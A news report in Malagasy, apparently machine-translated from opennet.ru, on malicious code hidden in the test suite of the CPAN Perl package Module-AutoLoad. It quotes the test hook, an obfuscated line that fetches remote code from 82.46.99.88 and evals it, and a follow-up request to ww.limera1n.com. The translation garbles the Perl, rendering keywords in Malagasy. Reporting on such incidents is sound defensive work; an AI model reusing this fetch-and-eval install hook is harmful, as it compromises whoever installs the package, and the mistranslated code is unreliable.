Kaody ratsy hita ao amin'ny fonosana Module-AutoLoad Perl

Ao anaty fonosana Perl nozaraina tamin'ny alΓ lan'ny lahatahiry CPAN Module-AutoLoad, natao hametahana ho azy ny maody CPAN amin'ny lalitra, fantatra code ratsy. Ny fampidirana ratsy dia HITA ao amin'ny code test 05_rcx.t, izay efa nalefa hatramin'ny 2011.
Tsara homarihina fa nipoitra ny fanontaniana momba ny fametrahana kaody mampiahiahy Stackoverflow niverina tamin'ny taona 2016.

Ny asa ratsy dia miainga amin'ny fiezahana misintona sy manatanteraka kaody avy amin'ny mpizara antoko fahatelo (http://r.cx:1/) mandritra ny fanatanterahana ny andiany fitsapana natomboka tamin'ny fametrahana ny maody. Heverina fa tsy ratsy ilay kaody nalaina tany am-boalohany avy amin'ny mpizara ivelany, fa ankehitriny ny fangatahana dia averina mankany amin'ny sehatra ww.limera1n.com, izay manome ny ampahany amin'ny fehezan-dalΓ na ho faty.

Mba handaminana ny fampidinana ao anaty rakitra 05_rcx.t Ity code manaraka ity dia ampiasaina:

ny $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
ny $ try = `$^X $prog`;

Ny kaody voafaritra dia mahatonga ny script ho tanterahina ../contrib/RCX.pl, izay ahena ho andalana ny ao anatiny:

ampiasao lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1β€³};

Mitondra ity script ity very hevitra mampiasa ny serivisy perlobfuscator.com kaody avy amin'ny mpampiantrano ivelany r.cx (kaody tarehin-tsoratra 82.46.99.88 mifanitsy amin'ny lahatsoratra "R.cX") ary manatanteraka izany ao amin'ny sakana eval.

$ perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88.":1β€³; print <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE....}

Aorian'ny famongorana ny fonosana dia tanterahana amin'ny farany ireto manaraka ireto: amin'ny:

print{$b=now IO::Socket::INET"ww.limera1n.com:80β€³}"GET /iJailBreak
";valo miverina fampitandremana$@while$b;1

Ny fonosana misy olana dia nesorina tao amin'ny tahiry. Pause (Perl Authors Upload Server), ary voasakana ny kaontin'ny mpanoratra module. Amin'ity tranga ity dia mbola mijanona ny module misy ao amin'ny tahiry MetaCPAN ary azo apetraka mivantana avy amin'ny MetaCPAN amin'ny fampiasana fitaovana sasany toy ny cpanminus. Marihinafa tsy niparitaka be ilay fonosana.

Mahaliana ny miresaka mifandray ary ny mpanoratra ny maody, izay nandΓ  ny fampahalalam-baovao fa nampidirina kaody ratsy taorian'ny nijirika ny tranokalany β€œr.cx” ary nanazava fa nanao fahafinaretana fotsiny izy, ary nampiasa ny perlobfuscator.com tsy hanafina zavatra, fa hampihena ny habeny. ny kaody ary manatsotra ny kopiany amin'ny alalan'ny takelaka. Ny safidin'ny anarana hoe "botstrap" dia hazavaina amin'ny hoe ity teny ity dia "toy ny bot ary fohy kokoa noho ny bootstrap." Nanome toky ihany koa ny mpanoratra ny maody fa ny fanodinkodinana voatondro dia tsy manao hetsika maloto, fa mampiseho fotsiny ny fametrahana sy ny fanatanterahana ny code amin'ny alΓ lan'ny TCP.

Source: opennet.ru

Add a comment